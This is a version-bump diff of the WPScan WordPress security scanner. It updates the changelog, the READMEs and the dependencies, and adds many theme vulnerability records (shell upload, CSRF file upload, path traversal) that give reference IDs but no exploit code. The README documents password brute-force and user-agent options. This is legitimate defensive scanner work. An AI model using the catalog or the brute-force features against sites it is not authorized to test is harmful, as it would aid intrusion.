Bumps the version

Example output:
  1) XML content each plugin vuln needs a type node
     Failure/Error: @result.should have(0).items, "Items:\n#{@result.join("\n")}"
       Items:
       ReFlex Gallery 1.4 - reflex-gallery.php Direct Request Path Disclosure
       Gallery Plugin 3.8.3 - gallery-plugin.php filename_1 Parameter Arbitrary File Access
       EZPZ One Click Backup <= 12.03.10 - OS Command Injection
       BulletProof Security - Security Log Script Insertion Vulnerability
       Portable phpMyAdmin - /pma/phpinfo.php Direct Request System Information Disclosure
       HMS Testimonials 2.0.10 - CSRF
       HMS Testimonials 2.0.10 - XSS
       platinum_seo_pack.php - s Parameter Reflected XSS
       Email Newsletter 8.0 - 'option' Parameter Information Disclosure Vulnerability

.travis.yml

@@ -4,4 +4,8 @@ rvm:
   - 1.9.3
   - 2.0.0
   - 2.1.0
-script: bundle exec rspec --format documentation
+  - 2.1.1
+script: bundle exec rspec
+notifications:
+  email:
+    - wpscanteam@gmail.com

CHANGELOG.md

@@ -1,6 +1,61 @@
 # Changelog
 ## Master
-[Work in progress](https://github.com/wpscanteam/wpscan/compare/2.3...master)
+[Work in progress](https://github.com/wpscanteam/wpscan/compare/2.4...master)
+
+## Version 2.4
+Released: 2014-04-17
+
+New
+* '--batch' switch option added - Fix #454
+* Add random-agent
+* Added more CLI options
+* Switch over to nist - Fix #301
+* New choice added when a redirection is detected - Fix #438
+
+
+Removed
+* Removed 'Total WordPress Sites in the World' counter from stats
+* Old wpscan repo links removed - Fix #440
+* Fingerprinting Dev script removed
+* Useless code removed
+
+General core
+* Rspecs update
+* Forcing Travis notify the team
+* Ruby 2.1.1 added to Travis
+* Equal output layout for interaction questions
+* Only output error trace if verbose if enabled
+* Memory improvements during wp-items enumerations
+* Fixed broken link checker, fixed some broken links
+* Couple more 404s fixed
+* Themes & Plugins list updated
+
+WordPress Fingerprints
+* WP 3.8.2 & 3.7.2 Fingerprints added - Fix #448
+* WP 3.8.3 & 3.7.3 fingerprints
+* WP 3.9 fingerprints
+
+Fixed issues
+* Fix #380 - Redirects in WP 3.6-3.0
+* Fix #413 - Check the version of the Timthumbs files found
+* Fix #429 - Error WpScan Cache Browser
+* Fix #431 - Version number comparison between '2.3.3' and '0.42b'
+* Fix #439 - Detect if the target goes down during the scan
+* Fix #451 - Do not rely only on files in wp-content for fingerprinting
+* Fix #453 - Documentation or inplemention of option parameters
+* Fix #455 - Fails with a message if the target returns a 403 during the wordpress check
+
+Vulnerabilities
+* Update WordPress Vulnerabilities
+* Fixed some duplicate vulnerabilities
+
+WPScan Database Statistics:
+* Total vulnerable versions: 79; 1 is new
+* Total vulnerable plugins: 748; 55 are new
+* Total vulnerable themes: 292; 41 are new
+* Total version vulnerabilities: 617; 326 are new
+* Total plugin vulnerabilities: 1162; 146 are new
+* Total theme vulnerabilities: 330; 47 are new
 
 ## Version 2.3
 Released: 2014-02-11
@@ -12,7 +67,7 @@ New
 * New spell checker!
 * Added database modification dates in status report
 * Added 'Total WordPress Sites in the World' statistics
-* Added separator between Name and Version in Item 
+* Added separator between Name and Version in Item
 * Added a "Work in progress" URL in the CHANGELOG
 
 Removed
@@ -44,7 +99,7 @@ WPScan Database Statistics:
 * Total plugin vulnerabilities: 1016; 236 are new
 * Total theme vulnerabilities: 283; 79 are new
 
-Add WP Fingerprints
+WordPress Fingerprints
 * Better fingerprints
 * WP 3.8.1 Fingerprinting
 * WP 3.8 Fingerprinting
@@ -53,10 +108,10 @@ Fixed issues
 * Fix #404 - Brute forcing issue over https
 * Fix #398 - Removed a fake vuln in WP Super Cache
 * Fix #393 - sudo added to the bundle install cmd for Mac OSX
-* Fix #228, #327 - Infinite loop when self-redirect 
+* Fix #228, #327 - Infinite loop when self-redirect
 * Fix #201 - Incorrect Paramter Parsing when no url was supplied
 
-## Version 2.2 
+## Version 2.2
 Released: 2013-11-12
 
 New

Gemfile

@@ -1,10 +1,10 @@
 source "https://rubygems.org"
 
-gem "typhoeus", ">=0.6.3"
+gem "typhoeus", "~>0.6.8"
 gem "nokogiri"
 gem "json"
 gem "terminal-table"
-gem "ruby-progressbar", ">=1.2.0"
+gem "ruby-progressbar", "~>1.4.2"
 
 group :test do
   gem "webmock", ">=1.17.2"

README

@@ -35,6 +35,7 @@ ryandewhurst at gmail
    * Kali Linux
    * Pentoo
    * SamuraiWTF
+   * ArchAssault
 
   Prerequisites:
 
@@ -82,7 +83,6 @@ ryandewhurst at gmail
 
   - Typhoeus segmentation fault:
       Update cURL to version => 7.21 (may have to install from source)
-      See http://code.google.com/p/wpscan/issues/detail?id=81
 
   - Proxy not working:
       Update cURL to version => 7.21.7 (may have to install from source).
@@ -132,15 +132,19 @@ ryandewhurst at gmail
     ap       all plugins (can take a long time)
     tt       timthumbs
     t        themes
-    vp       only vulnerable themes
+    vt       only vulnerable themes
     at       all themes (can take a long time)
-  Multiple values are allowed : '-e tt,p' will enumerate timthumbs and plugins
-  If no option is supplied, the default is 'vt,tt,u,vp'
+  Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugins
+  If no option is supplied, the default is "vt,tt,u,vp"
 
---exclude-content-based '<regexp or string>'  Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied
-                                              You do not need to provide the regexp delimiters, but you must write the quotes (simple or double)
+--exclude-content-based "<regexp or string>" Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied
+                                             You do not need to provide the regexp delimiters, but you must write the quotes (simple or double)
 
---config-file | -c <config file> Use the specified config file
+--config-file | -c <config file> Use the specified config file, see the example.conf.json
+
+--user-agent | -a <User-Agent> Use the specified User-Agent
+
+--random-agent | -r Use a random User-Agent
 
 --follow-redirection  If the target url has a redirection, it will be followed without asking if you wanted to do so or not
 
@@ -148,23 +152,35 @@ ryandewhurst at gmail
 
 --wp-plugins-dir <wp plugins dir>  Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
 
---proxy <[protocol://]host:port>  Supply a proxy (will override the one from conf/browser.conf.json).
-                                  HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported. If no protocol is given (format host:port), HTTP will be used
+--proxy <[protocol://]host:port> Supply a proxy (will override the one from conf/browser.conf.json).
+                                 HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported. If no protocol is given (format host:port), HTTP will be used
 
---proxy-auth <username:password>  Supply the proxy login credentials (will override the one from conf/browser.conf.json).
+--proxy-auth <username:password>  Supply the proxy login credentials.
 
---basic-auth <username:password>  Set the HTTP Basic authentication
+--basic-auth <username:password>  Set the HTTP Basic authentication.
 
 --wordlist | -w <wordlist>  Supply a wordlist for the password bruter and do the brute.
 
---threads  | -t <number of threads>  The number of threads to use when multi-threading requests. (will override the value from conf/browser.conf.json)
+--threads  | -t <number of threads>  The number of threads to use when multi-threading requests.
 
 --username | -U <username>  Only brute force the supplied username.
 
+--cache-ttl <cache-ttl>  Typhoeus cache TTL.
+
+--request-timeout <request-timeout>  Request Timeout.
+
+--connect-timeout <connect-timeout>  Connect Timeout.
+
+--max-threads <max-threads>  Maximum Threads.
+
 --help     | -h This help screen.
 
 --verbose  | -v Verbose output.
 
+--batch Never ask for user input, use the default behaviour.
+
+--no-color Do not use colors in the output.
+
 ==WPSCAN EXAMPLES==
 
 Do 'non-intrusive' checks...
@@ -201,17 +217,21 @@ Debug output...
 
 ==WPSTOOLS ARGUMENTS==
 
---help    | -h   This help screen.
---Verbose | -v   Verbose output.
---update  | -u   Update to the latest revision.
---generate_plugin_list [number of pages]  Generate a new data/plugins.txt file. (supply number of *pages* to parse, default : 150)
---gpl  Alias for --generate_plugin_list
---check-local-vulnerable-files | --clvf <local directory>  Perform a recursive scan in the <local directory> to find vulnerable files or shells
+-v, --verbose                                                Verbose output
+    --check-vuln-ref-urls, --cvru                            Check all the vulnerabilities reference urls for 404
+    --check-local-vulnerable-files, --clvf LOCAL_DIRECTORY   Perform a recursive scan in the LOCAL_DIRECTORY to find vulnerable files or shells
+    --generate-plugin-list, --gpl [NUMBER_OF_PAGES]          Generate a new data/plugins.txt file. (supply number of *pages* to parse, default : 150)
+    --generate-full-plugin-list, --gfpl                      Generate a new full data/plugins.txt file
+    --generate-theme-list, --gtl [NUMBER_OF_PAGES]           Generate a new data/themes.txt file. (supply number of *pages* to parse, default : 20)
+    --generate-full-theme-list, --gftl                       Generate a new full data/themes.txt file
+    --generate-all, --ga                                     Generate a new full plugins, full themes, popular plugins and popular themes list
+-s, --stats                                                  Show WpScan Database statistics
+    --spellcheck, --sc                                       Check all files for common spelling mistakes.
 
 ==WPSTOOLS EXAMPLES==
 
 - Generate a new 'most popular' plugin list, up to 150 pages ...
-ruby wpstools.rb --generate_plugin_list 150
+ruby wpstools.rb --generate-plugin-list 150
 
 - Locally scan a wordpress installation for vulnerable files or shells :
 ruby wpstools.rb --check-local-vulnerable-files /var/www/wordpress/

README.md

@@ -30,6 +30,7 @@ WPScan comes pre-installed on the following Linux distributions:
 - [Kali Linux](http://www.kali.org/)
 - [Pentoo](http://www.pentoo.ch/)
 - [SamuraiWTF](http://samurai.inguardians.com/)
+- [ArchAssault](https://archassault.org/)
 
 Prerequisites:
 
@@ -90,7 +91,6 @@ Apple Xcode, Command Line Tools and the libffi are needed (to be able to install
   - Typhoeus segmentation fault
 
       Update cURL to version => 7.21 (may have to install from source)
-      See http://code.google.com/p/wpscan/issues/detail?id=81
 
   - Proxy not working
 
@@ -131,7 +131,7 @@ Apple Xcode, Command Line Tools and the libffi are needed (to be able to install
 
 #### WPSCAN ARGUMENTS
 
-    --update  Update to the latest revision
+    --update   Update to the latest revision
 
     --url   | -u <target url>  The WordPress URL/domain to scan.
 
@@ -148,13 +148,17 @@ Apple Xcode, Command Line Tools and the libffi are needed (to be able to install
         t        themes
         vt       only vulnerable themes
         at       all themes (can take a long time)
-    Multiple values are allowed : '-e tt,p' will enumerate timthumbs and plugins
-    If no option is supplied, the default is 'vt,tt,u,vp'
+      Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugins
+      If no option is supplied, the default is "vt,tt,u,vp"
 
-    --exclude-content-based '<regexp or string>'  Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied
-                                                  You do not need to provide the regexp delimiters, but you must write the quotes (simple or double)
+    --exclude-content-based "<regexp or string>" Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied
+                                                 You do not need to provide the regexp delimiters, but you must write the quotes (simple or double)
 
-    --config-file | -c <config file> Use the specified config file
+    --config-file | -c <config file> Use the specified config file, see the example.conf.json
+
+    --user-agent | -a <User-Agent> Use the specified User-Agent
+
+    --random-agent | -r Use a random User-Agent
 
     --follow-redirection  If the target url has a redirection, it will be followed without asking if you wanted to do so or not
 
@@ -162,23 +166,35 @@ Apple Xcode, Command Line Tools and the libffi are needed (to be able to install
 
     --wp-plugins-dir <wp plugins dir>  Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
 
-    --proxy <[protocol://]host:port>  Supply a proxy (will override the one from conf/browser.conf.json).
-                                      HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported. If no protocol is given (format host:port), HTTP will be used
+    --proxy <[protocol://]host:port> Supply a proxy (will override the one from conf/browser.conf.json).
+                                     HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported. If no protocol is given (format host:port), HTTP will be used
 
-    --proxy-auth <username:password>  Supply the proxy login credentials (will override the one from conf/browser.conf.json).
+    --proxy-auth <username:password>  Supply the proxy login credentials.
 
-    --basic-auth <username:password>  Set the HTTP Basic authentication
+    --basic-auth <username:password>  Set the HTTP Basic authentication.
 
     --wordlist | -w <wordlist>  Supply a wordlist for the password bruter and do the brute.
 
-    --threads  | -t <number of threads>  The number of threads to use when multi-threading requests. (will override the value from conf/browser.conf.json)
+    --threads  | -t <number of threads>  The number of threads to use when multi-threading requests.
 
     --username | -U <username>  Only brute force the supplied username.
 
+    --cache-ttl <cache-ttl>  Typhoeus cache TTL.
+
+    --request-timeout <request-timeout>  Request Timeout.
+
+    --connect-timeout <connect-timeout>  Connect Timeout.
+
+    --max-threads <max-threads>  Maximum Threads.
+
     --help     | -h This help screen.
 
     --verbose  | -v Verbose output.
 
+    --batch Never ask for user input, use the default behaviour.
+
+    --no-color Do not use colors in the output.
+
 #### WPSCAN EXAMPLES
 
 Do 'non-intrusive' checks...
@@ -215,18 +231,23 @@ Debug output...
 
 #### WPSTOOLS ARGUMENTS
 
-    --help    | -h   This help screen.
-    --Verbose | -v   Verbose output.
-    --update  | -u   Update to the latest revision.
-    --generate_plugin_list [number of pages]  Generate a new data/plugins.txt file. (supply number of *pages* to parse, default : 150)
-    --gpl  Alias for --generate_plugin_list
-    --check-local-vulnerable-files | --clvf <local directory>  Perform a recursive scan in the <local directory> to find vulnerable files or shells
+    -v, --verbose                                                Verbose output
+        --check-vuln-ref-urls, --cvru                            Check all the vulnerabilities reference urls for 404
+        --check-local-vulnerable-files, --clvf LOCAL_DIRECTORY   Perform a recursive scan in the LOCAL_DIRECTORY to find vulnerable files or shells
+        --generate-plugin-list, --gpl [NUMBER_OF_PAGES]          Generate a new data/plugins.txt file. (supply number of *pages* to parse, default : 150)
+        --generate-full-plugin-list, --gfpl                      Generate a new full data/plugins.txt file
+        --generate-theme-list, --gtl [NUMBER_OF_PAGES]           Generate a new data/themes.txt file. (supply number of *pages* to parse, default : 20)
+        --generate-full-theme-list, --gftl                       Generate a new full data/themes.txt file
+        --generate-all, --ga                                     Generate a new full plugins, full themes, popular plugins and popular themes list
+    -s, --stats                                                  Show WpScan Database statistics.
+        --spellcheck, --sc                                       Check all files for common spelling mistakes.
+
 
 #### WPSTOOLS EXAMPLES
 
 Generate a new 'most popular' plugin list, up to 150 pages...
 
-```ruby wpstools.rb --generate_plugin_list 150```
+```ruby wpstools.rb --generate-plugin-list 150```
 
 Locally scan a wordpress installation for vulnerable files or shells :
 ```ruby wpstools.rb --check-local-vulnerable-files /var/www/wordpress/```

conf/browser.conf.json

@@ -1,65 +0,0 @@
-{
-  "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0",
-  /* Modes :
-    static : will use the defined user_agent for each request
-    semi-static : will randomly choose a user agent into available_user_agents before each scan
-    random : each request will choose a random user agent in available_user_agents
-  */
-  "user_agent_mode": "static",
-
-  /* Uncomment the "proxy" line to use the proxy
-    SOCKS proxies (4, 4A, 5) are supported, ie : "proxy": "socks5://127.0.0.1:9000"
-    If you do not specify the protocol, http will be used
-  */
-  //"proxy": "127.0.0.1:3128",
-  //"proxy_auth": "username:password",
-
-  "cache_ttl": 600, // 10 minutes, at this time the cache is cleaned before each scan. If this value is set to 0, the cache will be disabled
-
-  "request_timeout": 2000, // 2s
-
-  "connect_timeout": 1000, // 1s
-
-  "max_threads": 20,
-
-  // Some user_agents can be found there http://techpatterns.com/downloads/firefox/useragentswitcher.xml (thx to Gianluca Brindisi)
-  "available_user_agents":
-  [
-    // Windows
-    "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5",
-    "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14",
-    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
-    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
-    "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)",
-    "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
-    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
-    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
-    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
-    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
-    "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
-    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1",
-    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
-    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
-    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0)",
-    "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
-    "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5",
-
-    // MAC
-    "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13",
-    "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15",
-    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
-    "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3",
-    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
-    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
-    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
-
-    // Linux
-    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1",
-    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24",
-    "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9",
-    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0",
-    "Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0",
-    "Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00",
-    "Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0"
-  ]
-}

data/theme_vulns.xml

@@ -93,6 +93,13 @@
       </references>
       <type>UPLOAD</type>
     </vulnerability>
+    <vulnerability>
+      <title>vithy - Custom Background Shell Upload</title>
+      <references>
+        <url>http://packetstormsecurity.com/files/125827/</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
   </theme>
 
   <theme name="appius">
@@ -110,6 +117,13 @@
       </references>
       <type>UPLOAD</type>
     </vulnerability>
+    <vulnerability>
+      <title>appius - Custom Background Shell Upload</title>
+      <references>
+        <url>http://packetstormsecurity.com/files/125827/</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
   </theme>
 
   <theme name="yvora">
@@ -144,6 +158,13 @@
       </references>
       <type>UPLOAD</type>
     </vulnerability>
+    <vulnerability>
+      <title>Shotzz - Custom Background Shell Upload</title>
+      <references>
+        <url>http://packetstormsecurity.com/files/125827/</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
   </theme>
 
   <theme name="dagda">
@@ -154,6 +175,13 @@
       </references>
       <type>UPLOAD</type>
     </vulnerability>
+    <vulnerability>
+      <title>dagda - Custom Background Shell Upload</title>
+      <references>
+        <url>http://packetstormsecurity.com/files/125827/</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
   </theme>
 
   <theme name="moneymasters">
@@ -534,6 +562,7 @@
         <url>http://packetstormsecurity.org/files/114750/</url>
       </references>
       <type>UNKNOWN</type>
+      <fixed_in>2.0</fixed_in>
     </vulnerability>
   </theme>
 
@@ -584,6 +613,7 @@
         <url>http://packetstormsecurity.org/files/114750/</url>
       </references>
       <type>UNKNOWN</type>
+      <fixed_in>2.0</fixed_in>
     </vulnerability>
   </theme>
 
@@ -594,6 +624,7 @@
         <url>http://packetstormsecurity.org/files/114750/</url>
       </references>
       <type>UNKNOWN</type>
+      <fixed_in>2.0</fixed_in>
     </vulnerability>
   </theme>
 
@@ -614,6 +645,7 @@
         <url>http://packetstormsecurity.org/files/114750/</url>
       </references>
       <type>UNKNOWN</type>
+      <fixed_in>2.0</fixed_in>
     </vulnerability>
   </theme>
 
@@ -624,6 +656,7 @@
         <url>http://packetstormsecurity.org/files/114750/</url>
       </references>
       <type>UNKNOWN</type>
+      <fixed_in>2.0</fixed_in>
     </vulnerability>
   </theme>
 
@@ -634,6 +667,7 @@
         <url>http://packetstormsecurity.org/files/114750/</url>
       </references>
       <type>UNKNOWN</type>
+      <fixed_in>2.0</fixed_in>
     </vulnerability>
   </theme>
 
@@ -1811,12 +1845,20 @@
 
   <theme name="archin">
     <vulnerability>
-      <title>Archin - Cross-Site Scripting and Arbitrary File Upload Vulnerabilities</title>
+      <title>Archin 3.2 - Cross-Site Scripting and Arbitrary File Upload Vulnerabilities</title>
       <references>
         <secunia>50711</secunia>
       </references>
       <type>MULTI</type>
     </vulnerability>
+    <vulnerability>
+      <title>Archin 3.2 - hades_framework/option_panel/ajax.php Configuration Option Manipulation</title>
+      <references>
+        <osvdb>86991</osvdb>
+        <exploitdb>21646</exploitdb>
+      </references>
+      <type>RCE</type>
+    </vulnerability>
   </theme>
 
   <theme name="purity">
@@ -1899,6 +1941,13 @@
       </references>
       <type>XSS</type>
     </vulnerability>
+    <vulnerability>
+      <title>felici - Custom Background Shell Upload</title>
+      <references>
+        <url>http://packetstormsecurity.com/files/125830/</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
   </theme>
 
   <theme name="classic">
@@ -1947,7 +1996,7 @@
     <vulnerability>
       <title>Xss In wordpress ambience theme</title>
       <references>
-        <url>http://packetstorm.igor.onlinedirect.bg/1306-exploits/wpambience-xss.txt</url>
+        <url>http://www.websecuritywatch.com/wordpress-ambience-xss/</url>
       </references>
       <type>XSS</type>
     </vulnerability>
@@ -1987,6 +2036,7 @@
       <title>Persuasion &lt;= 2.4 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://packetstormsecurity.com/files/124547/</url>
         <url>http://www.securityfocus.com/bid/64501</url>
@@ -2435,6 +2485,7 @@
       <title>Highlight Powerful Premium - upload-handler.php File Upload CSRF</title>
       <references>
         <osvdb>99703</osvdb>
+        <secunia>55671</secunia>
         <exploitdb>29525</exploitdb>
         <url>http://packetstormsecurity.com/files/123974/</url>
       </references>
@@ -2562,7 +2613,7 @@
       <type>UPLOAD</type>
     </vulnerability>
   </theme>
-  
+
   <theme name="OptimizePress">
     <vulnerability>
       <title>OptimizePress - File Upload Vulnerability</title>
@@ -2578,7 +2629,7 @@
     </vulnerability>
   </theme>
 
-  <theme name="Blooog-v1.1">
+  <theme name="blooog">
     <vulnerability>
       <title>Blooog 1.1 - jplayer.swf Cross Site Scripting</title>
       <references>
@@ -2707,6 +2758,7 @@
       <title>DejaVu 2.4 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2730,6 +2782,7 @@
       <title>Elegance 2.4 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2753,6 +2806,7 @@
       <title>Echelon 2.4 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2776,6 +2830,7 @@
       <title>Modular 2.4 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2799,6 +2854,7 @@
       <title>Fusion 2.1 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2822,6 +2878,7 @@
       <title>Method 2.1 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2845,6 +2902,7 @@
       <title>Myriad 2.0 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2868,6 +2926,7 @@
       <title>Construct 1.4 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2891,6 +2950,7 @@
       <title>Awake 3.3 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2922,6 +2982,7 @@
       <title>InFocus 3.3 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download</title>
       <references>
         <osvdb>101331</osvdb>
+        <secunia>56359</secunia>
         <exploitdb>30443</exploitdb>
         <url>http://www.securityfocus.com/bid/64501</url>
       </references>
@@ -2987,4 +3048,483 @@
     </vulnerability>
   </theme>
 
+  <theme name="kiddo">
+    <vulnerability>
+      <title>Kiddo - remote shell upload vulnerability</title>
+      <references>
+        <url>http://packetstormsecurity.com/files/125138/</url>
+        <secunia>56874</secunia>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="thecotton_v114">
+    <vulnerability>
+      <title>The Cotton - Remote File Upload Vulnerability</title>
+      <references>
+        <osvdb>103911</osvdb>
+        <url>http://packetstormsecurity.com/files/125506/</url>
+        <url>http://www.securityfocus.com/bid/65958</url>
+        <url>http://seclists.org/bugtraq/2014/Mar/9</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="Realestate">
+    <vulnerability>
+      <title>Real Estate - Templatic Theme CSRF File Upload Vulnerability</title>
+      <references>
+        <url>http://1337day.com/exploit/22091</url>
+      </references>
+      <type>CSRF</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="dailydeal">
+    <vulnerability>
+      <title>Dailydeal - Templatic Theme CSRF File Upload Vulnerability</title>
+      <references>
+        <url>http://1337day.com/exploit/22091</url>
+      </references>
+      <type>CSRF</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="nightlife">
+    <vulnerability>
+      <title>Nightlife - Templatic Theme CSRF File Upload Vulnerability</title>
+      <references>
+        <url>http://1337day.com/exploit/22091</url>
+      </references>
+      <type>CSRF</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="5star">
+    <vulnerability>
+      <title>5star - Templatic Theme CSRF File Upload Vulnerability</title>
+      <references>
+        <url>http://1337day.com/exploit/22091</url>
+      </references>
+      <type>CSRF</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="specialist">
+    <vulnerability>
+      <title>Specialist - Templatic Theme CSRF File Upload Vulnerability</title>
+      <references>
+        <url>http://1337day.com/exploit/22091</url>
+      </references>
+      <type>CSRF</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="flatshop">
+    <vulnerability>
+      <title>Flatshop - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="magazine">
+    <vulnerability>
+      <title>Magazine - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="parallax">
+    <vulnerability>
